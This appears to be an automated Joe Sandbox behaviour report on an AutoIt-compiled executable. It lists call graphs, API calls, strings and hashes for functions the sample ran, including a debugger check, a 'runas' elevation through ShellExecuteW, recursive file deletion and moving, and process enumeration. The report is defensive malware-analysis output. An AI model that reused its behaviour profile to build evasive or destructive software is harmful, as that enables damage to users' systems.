102147->102204 102149 88560b 102205 8856ba 102149->102205 102150 8855e9 102153 885390 __wsopen_s 21 API calls 102150->102153 102151 8855c4 102151->102149 102151->102150 102156 885657 EnterCriticalSection 102151->102156 102155 8855ee 102153->102155 102154 885634 __wsopen_s 102154->102085 102155->102149 102208 8854d7 EnterCriticalSection 102155->102208 102156->102149 102157 885664 LeaveCriticalSection 102156->102157 102157->102151 102159->102094 102160->102098 102161->102095 102162->102091 102163->102098 102164->102106 102165->102098 102166->102102 102167->102109 102168->102108 102169->102110 102170->102113 102172 885754 __wsopen_s 26 API calls 102171->102172 102175 888a4e 102172->102175 102173 888a54 102210 8856c3 21 API calls 3 library calls 102173->102210 102175->102173 102177 885754 __wsopen_s 26 API calls 102175->102177 102185 888a86 102175->102185 102176 885754 __wsopen_s 26 API calls 102179 888a92 CloseHandle 102176->102179 102178 888a7d 102177->102178 102182 885754 __wsopen_s 26 API calls 102178->102182 102179->102173 102183 888a9e GetLastError 102179->102183 102180 888aac 102181 888ace 102180->102181 102211 87f633 20 API calls 2 library calls 102180->102211 102181->102095 102182->102185 102183->102173 102185->102173 102185->102176 102186->102119 102187->102123 102188->102121 102191 890777 102189->102191 102190 890792 102190->102135 102191->102190 102202 87f669 20 API calls _abort 102191->102202 102193 8907b6 102203 882b7c 26 API calls ___std_exception_copy 102193->102203 102195 8907c1 102195->102135 102196->102133 102197->102130 102198->102139 102199->102136 102200->102140 102201->102145 102202->102193 102203->102195 102204->102151 102209 883336 LeaveCriticalSection 102205->102209 102207 8856c1 102207->102154 102208->102149 102209->102207 102210->102180 102211->102181 102212 851098 102217 855d78 102212->102217 102216 8510a7 102218 85bf07 8 API calls 102217->102218 102219 855d8f GetVersionExW 102218->102219 102220 8584b7 8 API calls 102219->102220 102221 855ddc 102220->102221 102222 8596d9 8 API calls 102221->102222 102232 855e12 102221->102232 102223 855e06 102222->102223 102225 8579ed 8 API calls 102223->102225 102224 855ecc GetCurrentProcess IsWow64Process 102226 855ee8 102224->102226 102225->102232 102227 855f00 LoadLibraryA 102226->102227 102228 8950f2 GetSystemInfo 102226->102228 102229 855f11 GetProcAddress 102227->102229 102230 855f4d GetSystemInfo 102227->102230 102229->102230 102234 855f21 GetNativeSystemInfo 102229->102234 102231 855f27 102230->102231 102235 85109d 102231->102235 102236 855f2b FreeLibrary 102231->102236 102232->102224 102233 8950ad 102232->102233 102234->102231 102237 870433 29 API calls __onexit 102235->102237 102236->102235 102237->102216 102238 85105b 102243 85522e 102238->102243 102240 85106a 102274 870433 29 API calls __onexit 102240->102274 102242 851074 102244 85523e __wsopen_s 102243->102244 102245 85bf07 8 API calls 102244->102245 102246 8552f4 102245->102246 102247 85551b 10 API calls 102246->102247 102248 8552fd 102247->102248 102275 8551bf 102248->102275 102251 8565a4 8 API calls 102252 855316 102251->102252 102253 85684e 8 API calls 102252->102253 102254 855325 102253->102254 102255 85bf07 8 API calls 102254->102255 102256 85532e 102255->102256 102257 85bceb 8 API calls 102256->102257 102258 855337 RegOpenKeyExW 102257->102258 102259 894bc0 RegQueryValueExW 102258->102259 102263 855359 102258->102263 102260 894bdd 102259->102260 102261 894c56 RegCloseKey 102259->102261 102262 87019b 8 API calls 102260->102262 102261->102263 102271 894c68 _wcslen 102261->102271 102264 894bf6 102262->102264 102263->102240 102265 8541a6 8 API calls 102264->102265 102266 894c01 RegQueryValueExW 102265->102266 102268 894c1e 102266->102268 102270 894c38 ISource 102266->102270 102267 85627c 8 API calls 102267->102271 102269 8584b7 8 API calls 102268->102269 102269->102270 102270->102261 102271->102263 102271->102267 102272 85b25f 8 API calls 102271->102272 102273 85684e 8 API calls 102271->102273 102272->102271 102273->102271 102274->102242 102276 8922f0 __wsopen_s 102275->102276 102277 8551cc GetFullPathNameW 102276->102277 102278 8551ee 102277->102278 102279 8584b7 8 API calls 102278->102279 102280 85520c 102279->102280 102280->102251 102281 8a55f4 102282 86e34f 8 API calls 102281->102282 102283 8a560a 102282->102283 102289 8a5685 102283->102289 102290 86a9e5 9 API calls 102283->102290 102286 8a5665 102286->102289 102291 8c2393 8 API calls 102286->102291 102287 8a617b 102289->102287 102292 8c3ef6 81 API calls __wsopen_s 102289->102292 102290->102286 102291->102289 102292->102287

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 00855D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 515 855d78-855de7 call 85bf07 GetVersionExW call 8584b7 520 894f0c-894f1f 515->520 521 855ded 515->521 522 894f20-894f24 520->522 523 855def-855df1 521->523 524 894f27-894f33 522->524 525 894f26 522->525 526 894f4b 523->526 527 855df7-855e56 call 8596d9 call 8579ed 523->527 524->522 528 894f35-894f37 524->528 525->524 531 894f52-894f5e 526->531 540 8950ad-8950b4 527->540 541 855e5c-855e5e 527->541 528->523 530 894f3d-894f44 528->530 530->520 533 894f46 530->533 534 855ecc-855ee6 GetCurrentProcess IsWow64Process 531->534 533->526 536 855f45-855f4b 534->536 537 855ee8 534->537 539 855eee-855efa 536->539 537->539 546 855f00-855f0f LoadLibraryA 539->546 547 8950f2-8950f6 GetSystemInfo 539->547 544 8950d4-8950d7 540->544 545 8950b6 540->545 542 855e64-855e67 541->542 543 894fae-894fc1 541->543 542->534 548 855e69-855eab 542->548 549 894fea-894fec 543->549 550 894fc3-894fcc 543->550 552 8950d9-8950e8 544->552 553 8950c2-8950ca 544->553 551 8950bc 545->551 554 855f11-855f1f GetProcAddress 546->554 555 855f4d-855f57 GetSystemInfo 546->555 548->534 557 855ead-855eb0 548->557 560 894fee-895003 549->560 561 895021-895024 549->561 558 894fd9-894fe5 550->558 559 894fce-894fd4 550->559 551->553 552->551 562 8950ea-8950f0 552->562 553->544 554->555 563 855f21-855f25 GetNativeSystemInfo 554->563 556 855f27-855f29 555->556 570 855f32-855f44 556->570 571 855f2b-855f2c FreeLibrary 556->571 564 855eb6-855ec0 557->564 565 894f63-894f6d 557->565 558->534 559->534 566 895010-89501c 560->566 567 895005-89500b 560->567 568 89505f-895062 561->568 569 895026-895041 561->569 562->553 563->556 564->531 572 855ec6 564->572 575 894f6f-894f7b 565->575 576 894f80-894f8a 565->576 566->534 567->534 568->534 577 895068-89508f 568->577 573 89504e-89505a 569->573 574 895043-895049 569->574 571->570 572->534 573->534 574->534 575->534 578 894f9d-894fa9 576->578 579 894f8c-894f98 576->579 580 89509c-8950a8 577->580 581 895091-895097 577->581 578->534 579->534 580->534 581->534
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00855DA7
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,008EDC2C,00000000,?,?), ref: 00855ED3
                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00855EDA
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00855F05
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00855F17
                                                                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00855F25
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00855F2C
                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00855F51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                                                                                            • Opcode ID: bafac0a992debb7e028e4d0e9dd74bcdff0786610d0fedcd1604d3191939f1ec
                                                                                                                                                                            • Instruction ID: 51e6e4eac7e8cdc4c695e5eb9be9bd980c328e88e590a7be1c033bc0538ba1eb
                                                                                                                                                                            • Opcode Fuzzy Hash: bafac0a992debb7e028e4d0e9dd74bcdff0786610d0fedcd1604d3191939f1ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 8EA1D83282E7C5EFCB32EB687C515997F94BB36B05B085898E481E7221C63C454EEB31
                                                                                                                                                                            Function 008C9F9F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 582 8c9f9f-8c9fc7 FindFirstFileW 583 8c9fc9-8c9fde call 8755c2 582->583 584 8ca03a-8ca045 FindClose 582->584 593 8ca028-8ca038 FindNextFileW 583->593 594 8c9fe0-8c9ff5 call 8755c2 583->594 586 8ca04b-8ca05e FindFirstFileW 584->586 587 8ca0e2 584->587 588 8ca0d9 586->588 589 8ca060-8ca066 586->589 590 8ca0e4-8ca0e8 587->590 595 8ca0db-8ca0dc FindClose 588->595 592 8ca069-8ca070 589->592 596 8ca0c7-8ca0d7 FindNextFileW 592->596 597 8ca072-8ca087 call 8755c2 592->597 593->583 593->584 594->593 602 8c9ff7-8ca020 GetFileAttributesW SetFileAttributesW 594->602 595->587 596->588 596->592 597->596 603 8ca089-8ca09e call 8755c2 597->603 604 8ca0eb-8ca0f4 FindClose 602->604 605 8ca026 602->605 603->596 608 8ca0a0-8ca0be SetCurrentDirectoryW call 8c9f9f 603->608 604->590 605->593 611 8ca0f6-8ca0f8 608->611 612 8ca0c0-8ca0c5 SetCurrentDirectoryW 608->612 611->595 612->596
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,76F88FB0,?,00000000), ref: 008C9FC0
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 008C9FFE
                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(?,?), ref: 008CA018
                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,?), ref: 008CA030
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008CA03B
                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 008CA057
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008CA0A7
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00917B94), ref: 008CA0C5
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 008CA0CF
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008CA0DC
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008CA0EC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                            • Opcode ID: 3a5ebfb0166e52ebb278c362da4e1a45453a9654096a4f157859f985a06aca82
                                                                                                                                                                            • Instruction ID: b7c8601e5684cb8fb0d0c5ed089577d9fd5316936716e227f556ca95cfe63a8f
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a5ebfb0166e52ebb278c362da4e1a45453a9654096a4f157859f985a06aca82
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D31D23260074EAADB149BA4DC49EEE73BCFF05368F104159E915E7190EB75DA888A12
                                                                                                                                                                            Function 00853312 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,008532EF,?), ref: 00853342
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,008532EF,?), ref: 00853355
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00922418,00922400,?,?,?,?,?,?,008532EF,?), ref: 008533C1
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                              • Part of subcall function 008541E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008533E9,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00854227
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00000001,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00853442
                                                                                                                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00893C8A
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00893CCB
                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009131F4,00922418,?,?,?,?,?,?,?,008532EF), ref: 00893D54
                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00893D5B
                                                                                                                                                                              • Part of subcall function 0085345A: GetSysColorBrush.USER32(0000000F), ref: 00853465
                                                                                                                                                                              • Part of subcall function 0085345A: LoadCursorW.USER32(00000000,00007F00), ref: 00853474
                                                                                                                                                                              • Part of subcall function 0085345A: LoadIconW.USER32(00000063), ref: 0085348A
                                                                                                                                                                              • Part of subcall function 0085345A: LoadIconW.USER32(000000A4), ref: 0085349C
                                                                                                                                                                              • Part of subcall function 0085345A: LoadIconW.USER32(000000A2), ref: 008534AE
                                                                                                                                                                              • Part of subcall function 0085345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008534C6
                                                                                                                                                                              • Part of subcall function 0085345A: RegisterClassExW.USER32(?), ref: 00853517
                                                                                                                                                                              • Part of subcall function 0085353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00853568
                                                                                                                                                                              • Part of subcall function 0085353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00853589
                                                                                                                                                                              • Part of subcall function 0085353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,008532EF,?), ref: 0085359D
                                                                                                                                                                              • Part of subcall function 0085353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,008532EF,?), ref: 008535A6
                                                                                                                                                                              • Part of subcall function 008538F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008539C3
                                                                                                                                                                            Strings
                                                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00893C84
                                                                                                                                                                            • runas, xrefs: 00893D4F
                                                                                                                                                                            • AutoIt, xrefs: 00893C7F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                            • API String ID: 683915450-2030392706
                                                                                                                                                                            • Opcode ID: 53b6f526272d90d742aad535b1baa07a613d94d32c609313c160f372bd6529de
                                                                                                                                                                            • Instruction ID: 2fc56b9ee1412e7578277bc581bac1dc75e551f08ed48c89920c5363a69db3df
                                                                                                                                                                            • Opcode Fuzzy Hash: 53b6f526272d90d742aad535b1baa07a613d94d32c609313c160f372bd6529de
                                                                                                                                                                            • Instruction Fuzzy Hash: 1951D43010C385BACB16FF64AC559AE7BA4FF94749F440428F881D61A2DA348B8ED763
                                                                                                                                                                            Function 008BD836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1336 8bd836-8bd894 call 85bf07 * 3 call 85557e * 2 call 8be958 call 8be9c5 1351 8bd89f-8bd8a9 call 8be9c5 1336->1351 1352 8bd896-8bd89a call 8565a4 1336->1352 1356 8bd8ab-8bd8af call 8565a4 1351->1356 1357 8bd8b4-8bd8f2 call 85bf07 * 2 call 85694e FindFirstFileW 1351->1357 1352->1351 1356->1357 1365 8bd8f8 1357->1365 1366 8bda23-8bda2a FindClose 1357->1366 1368 8bd8fe-8bd900 1365->1368 1367 8bda2d-8bda5b call 85bd2c * 5 1366->1367 1368->1366 1370 8bd906-8bd90d 1368->1370 1372 8bd9ef-8bda02 FindNextFileW 1370->1372 1373 8bd913-8bd979 call 85b25f call 8bdf85 call 85bd2c call 857af4 call 8565a4 call 8bdc8e 1370->1373 1372->1368 1376 8bda08-8bda0d 1372->1376 1395 8bd97b-8bd97e 1373->1395 1396 8bd99f-8bd9a3 1373->1396 1376->1368 1397 8bda12-8bda21 FindClose call 85bd2c 1395->1397 1398 8bd984-8bd99b call 86e2e5 1395->1398 1399 8bd9d1-8bd9d7 call 8bda5c 1396->1399 1400 8bd9a5-8bd9a8 1396->1400 1397->1367 1410 8bd9ad-8bd9b6 MoveFileW 1398->1410 1413 8bd99d DeleteFileW 1398->1413 1407 8bd9dc 1399->1407 1404 8bd9aa 1400->1404 1405 8bd9b8-8bd9c8 call 8bda5c 1400->1405 1404->1410 1405->1397 1414 8bd9ca-8bd9cf DeleteFileW 1405->1414 1412 8bd9df-8bd9e1 1407->1412 1410->1412 1412->1397 1415 8bd9e3-8bd9eb call 85bd2c 1412->1415 1413->1396 1414->1412 1415->1372
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
                                                                                                                                                                              • Part of subcall function 008BE9C5: GetFileAttributesW.KERNELBASE(?,008BD755), ref: 008BE9C6
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 008BD8E2
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 008BD99D
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 008BD9B0
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 008BD9CD
                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 008BD9F7
                                                                                                                                                                              • Part of subcall function 008BDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,008BD9DC,?,?), ref: 008BDA72
                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 008BDA13
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008BDA24
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                                                            • Opcode ID: ca1f4ecac4ebd319a777d36cabf34469f9edeb085a9cbaef37c20d6d41330d22
                                                                                                                                                                            • Instruction ID: a1999fb321dd7a9f09e3b331cd199e1f6e4d64b68cc934dae5e05cb87f505d96
                                                                                                                                                                            • Opcode Fuzzy Hash: ca1f4ecac4ebd319a777d36cabf34469f9edeb085a9cbaef37c20d6d41330d22
                                                                                                                                                                            • Instruction Fuzzy Hash: 16613B3180125DAACF05EBA4D9929EDBBB5FF15301F244065E806F7292EB356F0DCB51
                                                                                                                                                                            Function 008BDB69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
                                                                                                                                                                              • Part of subcall function 008BE9C5: GetFileAttributesW.KERNELBASE(?,008BD755), ref: 008BE9C6
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 008BDBE0
                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,?), ref: 008BDC30
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 008BDC41
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008BDC58
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008BDC61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                                                                            • Opcode ID: 7f667f9faea50c4abafda4fd05c4711ffeb8e20efff8c9cd646e828199d7b7ec
                                                                                                                                                                            • Instruction ID: fa46d49053f0bab51fb936da3b075f1209af3ecd21d70c0532e7f4f339ccea70
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f667f9faea50c4abafda4fd05c4711ffeb8e20efff8c9cd646e828199d7b7ec
                                                                                                                                                                            • Instruction Fuzzy Hash: E7313031008389ABC701EB68D8959EFB7A8FE91315F44495DF8D1D7291EB60DA0DC753
                                                                                                                                                                            Function 008BDC9C Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 008BDCC1
                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 008BDCCF
                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 008BDCEF
                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 008BDD9C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                            • Opcode ID: 3f969797b4c1c84692615b8f402931e31db5bc866b34f19e5cedd84f0d7ad222
                                                                                                                                                                            • Instruction ID: 983772864e829d6c36a6f966d8952c34312e290020f20c05cc2e2a4f8b425a6d
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f969797b4c1c84692615b8f402931e31db5bc866b34f19e5cedd84f0d7ad222
                                                                                                                                                                            • Instruction Fuzzy Hash: D4314B71108344AFD301EF64D885AAEBBF8FF99350F44092DF985C62A1EB619949CB93
                                                                                                                                                                            Function 008BE387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(?,00894686), ref: 008BE397
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 008BE3A6
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 008BE3B7
                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 008BE3C3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
